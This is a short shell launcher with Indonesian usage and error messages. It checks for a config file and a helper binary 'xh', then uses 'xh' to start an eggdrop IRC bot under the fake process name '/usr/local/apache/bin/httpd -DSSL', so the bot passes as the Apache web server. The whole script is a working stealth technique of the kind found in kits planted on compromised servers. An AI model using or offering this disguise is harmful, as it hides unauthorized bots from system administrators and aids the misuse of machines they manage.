#!/bin/sh

if test $# -ne 1
then
  echo "Cara Penggunaan :"
  echo ""
  echo "   ./dssl [config file]"
  echo ""
  exit
fi

if ! test -s $1
then
  echo "Kesalahan : file $1 tidak ditemukan !!!"
  echo ""
  exit
fi

if ! test -s xh
then
  echo "Kesalahan : file xh tidak ditemukan !!!"
  echo ""
  exit
fi

./xh -s "/usr/local/apache/bin/httpd -DSSL" ./eggdrop -m $1


